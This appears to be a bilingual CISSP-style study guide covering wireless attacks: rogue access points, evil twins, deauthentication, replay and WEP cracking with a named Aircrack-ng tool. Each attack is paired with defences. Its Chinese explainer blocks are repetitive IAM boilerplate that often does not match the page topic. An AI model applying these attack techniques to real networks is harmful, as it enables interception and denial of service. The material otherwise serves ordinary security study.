该名称源自传统的攻击概念 战争拨号,后者通过拨打电话前缀或 区号内的所有号码来发现活动的计算机调制解调器。 战争驾驶可以通过专用手 持检测器、具有 Wi‑Fi 功能的 移动设备、配备无线网卡的笔记本电脑,甚至无 人机(战争飞行)来执行。 可以使用操作系统的原生功能,或使用专门的扫描 和检测工具(即无线扫描仪)来执行。 使用无线扫描仪来检测无线网络的存在。 任何未被法拉第笼屏蔽的活跃无线网 络均可被检测到,因为即使禁用了SSID广播,接入点仍会传输无线电波。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

公钥基础设施 PKI:PKI 用证书、CA、注册、吊销等机制管理公钥信任。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

CA、RA、证书、CRL、OCSP、信任链都是 PKI 高频点。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 66 / PDF P784

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

A wireless scanner is able to determine whether there are wireless networks in the area, what frequency and channel they are using, the SSID, and what type of encryption is in use (if any). A wireless cracker can be used to break the encryption of WEP and WPA networks. WPA2 networks might be vulnerable to Key Reinstallation AttaCKs (KRACK) if devices have not been updated since 2017. Rogue Access Points A rogue WAP may be planted by an employee for convenience, installed internally by a physical intruder, or operated externally by an attacker.

Such unauthorized access points usually aren't configured for security, or, if they are, they aren't configured properly or in line with the organization's approved access points. Rogue WAPs should be discovered and removed to eliminate an unregulated access path into your otherwise secured network. A rogue WAP or false WAP can be deployed by an attacker externally to target your existing wireless clients or future visiting wireless clients. An attack against existing wireless clients requires that the rogue WAP be configured to duplicate the SSID, MAC address, and wireless channel of the valid WAP, although operating at a higher power rating.

This may cause clients with saved wireless profiles to inadvertently select or prefer to connect to the rogue WAP instead of the valid original WAP. A second method used by a rogue WAP focuses on attracting new visiting wireless clients. This type of rogue WAP is configured with a social engineering trick by setting the SSID to an alternate name that appears legitimate or even preferred over the original valid wireless network's SSID. The rogue WAP's MAC address and channel do not need to be clones of the original WAP.

The defense against rogue WAPs is to operate a wireless intrusion detection system (WIDS) to monitor the wireless signals for abuses, such as newly appearing WAPs, especially those operating with mimicked or similar SSID and MAC values. An administrator or security team member could attempt to locate rogue WAPs through the use of a wireless scanner and a directional antenna to perform triangulation. Once a rogue device is located, the investigation can turn to figuring out how it got there and who was responsible. For clients, the best option is to connect a VPN across the wireless link, and only if the VPN connection is established successfully should the wireless

中文直译 / 整理

无线扫描仪能够确定该区域是否存在无线网络、它们使用的频率和信道、 SSID以及正在使用的加密类型(如果有)。 无线破解工具可用于破解WEP和 WPA网络的加密。 如果设备自2017年以来未更新,WPA2网络可能易受密钥 重装攻击(KRACK)。 rogue 接入点 恶意 WAP 可能由员工为方便起见而部署,也可能由物理入侵者在内部安装, 或由攻击者在外部操作。 这些未经授权的接入点通常未配置安全设置,或者 即使进行了配置,也未正确配置或不符合组织批准的接入点标准。 应发现并 移除恶意 WAP,以消除进入您其他方面受保护网络的不受监管的访问路径。 攻击者可以在外部部署恶意 WAP 或虚假 WAP,以针对您现有的无线客户端或 未来来访的无线客户端。 针对现有无线客户端的攻击要求恶意 WAP 配置为复 制合法 WAP 的 SSID、MAC 地址和无线信道,但以更高的功率运行。 这可能 导致具有保存无线配置文件的客户端无意中选择或优先连接到恶意 WAP,而 非合法的原始 WAP。 恶意 WAP 使用的第二种方法是吸引新的来访无线客户端。

这种类型的恶意 WAP 通过将 SSID 设置为看似合法甚至优于原始合法无线网络 SSID 的替代 名称,来实施社会工程学欺骗。 恶意 WAP 的 MAC 地址和信道无需复制原 始 WAP。 防范恶意WAP的措施是运行无线入侵检测系统(WIDS),以监控无线信号 中的滥用行为,例如新出现的WAP,尤其是那些使用模仿或相似SSID和 MAC值的WAP。 管理员或安全团队成员可以使用无线扫描仪和定向天线进行三角定位,以查 找恶意WAP。 一旦定位到恶意设备,调查便可转向查明其如何进入以及谁应 对此负责。 对于客户端而言,最佳方案是通过无线链路连接VPN,仅当VPN连接成功建立后, 才应使用无线

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 67 / PDF P785

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

link be used. VPNs can be set up in private networks for local wireless clients, or a public VPN provider can be used when connecting to public wireless networks. Evil Twin Evil twin is an attack in which a threat actor operates a false access point that will automatically clone or twin the identity of an access point based on a client device's request to connect. Each time a typical device successfully connects to a wireless network, it retains a wireless profile in its history. These wireless profiles are used to reconnect to a network automatically whenever the device is within range of the related base station.

Each time the wireless adapter is enabled on a device, it sends out reconnection requests to each of the networks in its wireless profile history. These reconnect requests include the original base station's MAC address and the network's SSID. The evil twin attack system eavesdrops on the wireless signal for these reconnect requests. Once the evil twin sees a reconnect request, it spoofs its identity with those parameters and offers a plaintext connection to the client. The client accepts the request and establishes a connection with the false evil twin base station.

This enables the malicious actor to eavesdrop on communications through an AitM attack, which could lead to session hijacking, data manipulation credential theft, and identity theft. This attack works because authentication and encryption are managed by the base station, not enforced by the client. Thus, even though the client's wireless profile will include authentication credentials and encryption information, the client will accept whatever type of connection is offered by the base station, including plaintext. To defend against evil twin attacks, pay attention to the wireless network your devices connect to.

If you connect to a network that you know is not located nearby, it may be a sign that you are under attack. Disconnect and go elsewhere for internet access. You should also prune unnecessary and old wireless profiles from your history list to give attackers fewer options to target. You can be easily fooled into thinking that you are connected to a proper and valid base station or connected to a false one. On most systems, you can check to see what if any communication security (i.e., encryption) is currently in use. If your network connection is not secure, you can either disconnect and go elsewhere or connect to a VPN. We always recommend attempting to

中文直译 / 整理

链路。 VPN可以在私有网络中为本地无线客户端设置,或在连接公共无线网络 时使用公共VPN提供商。 邪恶双胞胎 邪恶双胞胎是一种攻击,攻击者操作一个虚假的接入点,该接入点会根据客户 端设备的连接请求自动克隆或孪生接入点的身份。 每次典型设备成功连接到无 线网络时,都会在其历史记录中保留一个无线配置文件。 这些无线配置文件用 于在设备处于相关基站范围内时自动重新连接到网络。 每当设备上的无线适配 器启用时,它会向其无线配置文件历史中的每个网络发送重新连接请求。 这些 重新连接请求包括原始基站的MAC地址和网络的SSID。 邪恶双胞胎攻击系统会 窃听无线信号以捕获这些重新连接请求。 一旦邪恶双胞胎检测到重新连接请求, 它就会使用这些参数伪装自己的身份,并向客户端提供明文连接。 客户端接受 该请求并与虚假的邪恶双胞胎基站建立连接。 这使得恶意攻击者能够通过中间 人(AitM)攻击窃听通信,可能导致会话劫持、数据篡改、凭证窃取和身份盗 窃。 这种攻击之所以有效,是因为认证和加密由基站管理,而非由客户端强制执行。 因此,尽管客户端的无线配置文件中包含认证凭证和加密信息,客户端仍会接 受基站提供的任何类型的连接,包括明文连接。

为防范假冒基站攻击,请注意您的设备连接的无线网络。 如果您连接到一个您 知道并不在附近的网络,这可能是您正遭受攻击的迹象。 请断开连接并改用其 他方式访问互联网。 您还应从历史记录中删除不必要的旧无线配置文件,以减 少攻击者可利用的目标。 您可能会轻易被误导,以为自己连接到了一个正确且有效的基站,或者连接到 了一个虚假的基站。 在大多数系统中,您可以检查当前是否启用了任何通信安 全措施(例如加密)。 如果您的网络连接不安全,您可以断开连接并前往其他 地方,或连接到VPN。 我们始终建议尝试

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 68 / PDF P786

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

connect to a VPN when using a wireless connection, even if your network properties show a valid security type. Disassociation Disassociation is one of the many types of wireless management frames. A disassociation frame is used to disconnect a client from one WAP as it is connecting to another WAP in the same ESSID network coverage area. If used maliciously, the client loses their wireless link. A similar attack can be performed using a deauthentication packet. This packet is normally used immediately after a client initiates WAP authentication but fails to provide proper credentials.

However, if sent at any time during a connected session, the client immediately disconnects as if its authentication did fail. These management frames can be used in several forms of wireless attacks, including the following: For networks with hidden SSIDs, a disassociation packet with a MAC address spoofed as that of the WAP is sent to a connected client that causes the client to lose its connection and then send a Reassociation Request packet (in an attempt to reestablish a connection), which includes the SSID in the clear. An attack can send repeated disassociation frames to a client to prevent reassociation, thus causing a DoS.

A session hijack event can be initiated by using disassociation frames to keep the client disconnected while the attacker impersonates the client and takes over their wireless session with the WAP. An AitM attack can be implemented by using a disassociation frame to disconnect a client. Then the attacker provides a stronger signal from their rogue/fake WAP using the same SSID and MAC as the original WAP; once the client connects to the false WAP, the attacker connects to the valid WAP. The main defense against these attacks is to use WAP3 and/or operate a WIDS, which monitors for wireless abuses. Jamming

中文直译 / 整理

在使用无线连接时连接到VPN,即使您的网络属性显示了有效的安全类型。 解除关联 解除关联是多种无线管理帧中的一种。 解除关联帧用于在客户端连接到同一 ESSID网络覆盖区域内的另一个WAP时,将其与当前WAP断开连接。 如果被恶 意使用,客户端将失去其无线连接。 可以使用去认证数据包执行类似的攻击。 此数据包通常在客户端启动WAP 身份验证但未能提供正确凭证时立即发送。 然而,如果在连接会话期间的任何 时间发送,客户端将立即断开连接,仿佛其身份验证失败了一样。 这些管理帧可用于多种无线攻击形式,包括以下几种: 对于隐藏SSID的网络,会向已连接的客户端发送一个解除关联数据包, 该数据包的MAC地址被伪造为WAP的地址,导致客户端失去连接,然 后发送重新关联请求数据包(试图重新建立连接),该数据包以明文 形式包含SSID。 攻击可以通过向客户端发送重复的解除关联帧来阻止其重新关联,从而造成 拒绝服务(DoS)。 会话劫持事件可以通过使用解除关联帧使客户端保持断开连接,同时攻击 者冒充客户端并接管其与WAP的无线会话来发起。 中间人(AitM)攻击可以通过使用解除关联帧断开客户端连接来实现。

然后,攻击者使用与原始WAP相同的SSID和MAC地址,提供来自其恶意/ 伪造WAP的更强信号; 一旦客户端连接到该虚假WAP,攻击者便连接到 合法的WAP。 抵御这些攻击的主要方法是使用WAP3和/或运行WIDS,后者用于监控无线滥用 行为。 干扰

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

检测是 IDS,主动阻断更像 IPS。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 69 / PDF P787

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Jamming is the transmission of radio signals to intentionally prevent or interfere with communications by decreasing the effective signal-to-noise ratio. To avoid or minimize interference and jamming, start by adjusting the physical location of devices. Next, check for devices using the same frequency and/or channel (i.e., signal configuration). If there are conflicts, change the frequency or channel in use on devices you control. If an interference attack is occurring, try to triangulate the source of the attack and take appropriate steps to address the concern—that is, contact law enforcement if the source of the problem is outside of your physical location.

Initialization Vector (IV) Abuse An initialization vector (IV) is a mathematical and cryptographic term for a random number. Most modern crypto functions use IVs to increase their security by reducing predictability and repeatability. An IV becomes a point of weakness when it's too short, exchanged in plaintext, or selected improperly. One example of an IV attack is cracking WEP encryption using the wessideng tool from the Aircrack-ng suite at http://aircrack-ng.org. Replay A replay attack is the retransmission of captured communications in the hope of gaining access to the targeted system.

Replay attacks attempt to reestablish a communication session by replaying (i.e., retransmitting) captured traffic against a system. This may grant an adversary access into an account without the attacker possessing the account's actual credentials. The replay attack concept is also used against cryptographic algorithms that don't incorporate temporal protections. In this attack, the malicious individual intercepts an encrypted message between two parties (often a request for authentication) and then later “replays” the captured message to open a new session. Many wireless replay attack variants exist.

They include capturing new connection requests of a typical client and then replaying that connect request to fool the base station into responding as if another new client connection request was initiated. Wireless replay attacks can also focus on DoS by retransmitting connection requests or resource requests of the base station to keep it busy focusing on managing new connections rather than maintaining and providing service for existing connections.

中文直译 / 整理

干扰是通过传输无线电信号来故意阻止或干扰通信,其方法是降低有效信噪比。 为避免或最小化干扰和干扰,首先应调整设备的物理位置。 接下来,检查是否 有设备使用相同的频率和/或信道(即信号配置)。 如果存在冲突,请更改您所 控制设备上使用的频率或信道。 如果发生干扰攻击,请尝试定位攻击源并采取 适当措施解决问题——即,如果问题源位于您的物理位置之外,请联系执法部 门。 初始化向量(IV)滥用 一个 初始化向量(IV) 是数学和密码学中的术语,指一个随机数。 大多数现代 加密函数使用 IV 来通过降低可预测性和重复性提高安全性。 当 IV 过短、以明 文交换或选择不当时,它就会成为安全弱点。 IV 攻击的一个例子是使用 Aircrack‑ng 工具套件中的 wesside-ng 工具破解 WEP 加密,工具地址为 http://aircrack-ng.org。 重放 重放攻击 是通过重新传输捕获的通信数据,试图获得对目标系统的访问权限。 重放攻击通过重放(即重新传输)捕获的流量来尝试重建通信会话。 这可能使 攻击者在不掌握账户实际凭证的情况下访问账户的情况下获得访问权限。 重放攻击的概念也被用于针对未包含时间保护机制的加密算法。

在此类攻击 中,恶意个体拦截两个通信方之间的加密消息(通常是身份验证请求),然 后稍后“重放”捕获的消息以打开新的会话。 存在许多无线重放攻击变种。 它们包括捕获典型客户端的新连接请求,然后 重放该连接请求,以欺骗基站响应,使其误以为另一个新客户端连接请求已 被发起。 无线重放攻击还可以通过重传基站的连接请求或资源请求来实施拒 绝服务(DoS),使基站忙于管理新连接,而非维护和提供现有连接的服务。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 70 / PDF P788

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Wireless replay attacks can be mitigated by keeping the firmware of the base station updated. A WIDS will be able to detect such abuses and inform the administrators promptly about the situation. Additional defenses include using one-time authentication mechanisms, a timestamp and expiration period in each message, using challenge-response based authentication, and using sequenced session identification. Satellite Communications Satellite communications are primarily based on transmitting radio waves between terrestrial locations and an orbiting artificial satellite. Satellites are used to support telephone, television, radio, internet, and military communications.

Satellites can be positioned in three primary orbits: low Earth orbit (LEO), 160–2,000 km, medium Earth orbit (MEO), 2,000– 35,786 km, and geostationary orbit (GEO), 35,786 km. LEO satellites often have stronger signals than other orbits, but they do not remain in the same position over the earth, so multiple devices must be used to maintain coverage. Starlink (from SpaceX) is an example of a LEO satellite-based internet service. Starlink has plans to deploy a constellation of over 40,000 satellites to provide global coverage of their internet from space service. MEO satellites are in the sky above a terrestrial location for longer than a LEO satellite.

Individual MEO satellites also usually have a larger transmission footprint (area of the earth covered by its transmitter/receiver) than that of LEO satellites. However, due to the higher orbit, there is additional delay and a weaker signal from MEO satellites. GEO satellites appear motionless in the sky, as they are rotating around the earth at the same angular velocity as the earth rotates. Thus, GEO satellites maintain a fixed position above a terrestrial location. GEO satellites have a larger transmission footprint than MEO satellites but also a higher latency.

But GEO satellites do not require that a ground station track the movement of the satellite across the sky, as is necessary with LEO and MEO satellites, so GEO ground stations can use fixed antennas. Cellular Networks

中文直译 / 整理

通过保持基站固件的更新,可以缓解无线重放攻击。 无线入侵检测系统( WIDS)能够检测此类滥用行为,并及时通知管理员。 其他防御措施包括使用 一次性认证机制、在每条消息中包含时间戳和过期时间、采用挑战‑响应式认 证,以及使用序列化会话标识。 卫星通信 卫星通信主要基于在地面位置与轨道人造卫星之间传输无线电波。 卫星用于 支持电话、电视、广播、互联网和军事通信。 卫星可位于三种主要轨道上: 低地球轨道(LEO),160–2,000公里,中地球轨道(MEO),2,000– 35,786公里,以及地球静止轨道(GEO),35,786公里。 LEO卫星的信号通常比其他轨道更强,但它们不会在地球上方保持固定位置, 因此必须使用多个设备以维持覆盖。 Starlink(来自SpaceX)是基于LEO卫星 的互联网服务的一个例子。 Starlink计划部署一个超过40,000颗卫星的星座, 以提供从太空覆盖全球的互联网服务。 MEO卫星在地面位置上空的停留时间比LEO卫星更长。 单个MEO卫星的传输 覆盖范围(其发射器/接收器所覆盖的地球区域)通常也比LEO卫星更大。 然 而,由于轨道较高,MEO卫星存在额外的延迟和较弱的信号。

地球同步轨道(GEO)卫星在天空中看起来是静止的,因为它们以与地球自转 相同的角速度绕地球旋转。 因此,GEO卫星能保持在地面位置的上方固定位置。 GEO卫星的传输覆盖范围比中地球轨道(MEO)卫星更大,但延迟也更高。 然 而,GEO卫星不需要地面站跟踪卫星在天空中的移动,而这是低地球轨道( LEO)和MEO卫星所必需的,因此GEO地面站可以使用固定天线。 蜂窝网络

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 71 / PDF P789

第 789 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A cellular network, mobile network, or wireless network is the primary communications technology that is used by many mobile devices, especially cell phones and smartphones. The network is organized around areas of access called cells, which are centered around a primary transceiver, known as a cell site, cell tower, or base station. The services provided over cellular networks are often referred to by a generational code, such as 2G, 3G, 4G, and 5G. Generally, cellular service is encrypted, but only while the communication is being transmitted from the mobile device to a transmission tower. Communications are effectively plaintext once they are being transmitted over wires.

So, avoid performing any task over cellular that is sensitive or confidential in nature. Use an encrypted communications application to preencrypt communications before transmitting them over a cellular connection, such as TLS or a VPN. 4G has been in use since the early 2000s and most cellular devices support 4G communications. The 4G standard allows for mobile devices to achieve 100 Mbps, whereas stationary devices can reach 1 Gbps. 4G is primarily using IP-based communications for both voice and data, rather than the traditional circuit-switching telephony services of the past. 4G is provided by various transmission systems, the most common being LTE, followed by WiMAX.

5G is the latest mobile service technology that is available for use on some mobile phones, tablets, and other equipment. Many ICS, IoT, and specialty devices may have embedded 5G capabilities. 5G uses higher frequencies than previous cellular technologies, which has allowed for higher transmission speeds (up to 10 Gbps) but at a reduced distance. Organizations need to be aware of when and where 5G is available for use and enforce security requirements on such communications. There are a few key issues to keep in mind with regard to cell phone wireless transmissions. First, communications over a cell phone provider's network, whether voice, text, or data, are not necessarily secure.

Second, with specific wireless-sniffing equipment, your cell phone transmissions can be intercepted. In fact, your provider's towers can be simulated to conduct adversary-in-the-middle attacks. Third, using your cell phone connectivity to access the Internet or your office network provides attackers with yet another potential avenue of attack, access, and compromise. Many of these devices can potentially act as bridges, creating insecure access into a company network.

中文直译 / 整理

蜂窝网络、移动网络或无线网络是许多移动设备,尤其是手机和智能手机所使 用的主要通信技术。 该网络围绕称为小区的接入区域组织,这些小区以一个主 要的收发器为中心,该收发器被称为小区站点、基站或蜂窝塔。 通过蜂窝网络 提供的服务通常用代际代码表示,例如2G、3G、4G和5G。 通常情况下,蜂窝服务是加密的,但仅限于通信从移动设备传输到基站的过程 中。 一旦通信通过有线传输,内容即变为明文。 因此,避免通过蜂窝网络执行 任何敏感或机密的任务。 请使用加密通信应用程序,在通过蜂窝连接传输之前 预先加密通信内容,例如使用 TLS 或 VPN。 4G 自 2000 年代初以来一直被使用,大多数蜂窝设备都支持 4G 通信。 4G 标 准允许移动设备达到 100 Mbps 的速度,而固定设备则可达到 1 Gbps。 4G 主 要使用基于 IP 的通信来传输语音和数据,而非过去传统的电路交换电话服务。 4G 由多种传输系统提供,最常见的是 LTE,其次是 WiMAX。 5G 是目前可用于部分手机、平板电脑及其他设备的最新移动服务技术。 许多 ICS、IoT 和专用设备可能内置了 5G 功能。

5G 使用比以往蜂窝技术更高的频 率,这使得传输速度更高(最高可达 10 Gbps),但传输距离缩短。 组织需要 了解 5G 可用的时间和地点,并对这类通信实施安全要求。 关于手机无线传输,有几个关键问题需要注意。 首先,通过手机运营商网络进 行的通信,无论是语音、短信还是数据,都不一定安全。 其次,使用特定的无 线嗅探设备,您的手机传输内容可能被截获。 事实上,您的运营商基站可能被 模拟以实施中间人攻击。 第三,使用手机连接访问互联网或公司网络,为攻击 者提供了另一条潜在的攻击、访问和渗透途径。 许多此类设备可能充当桥梁, 从而在公司网络中创建不安全的访问入口。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

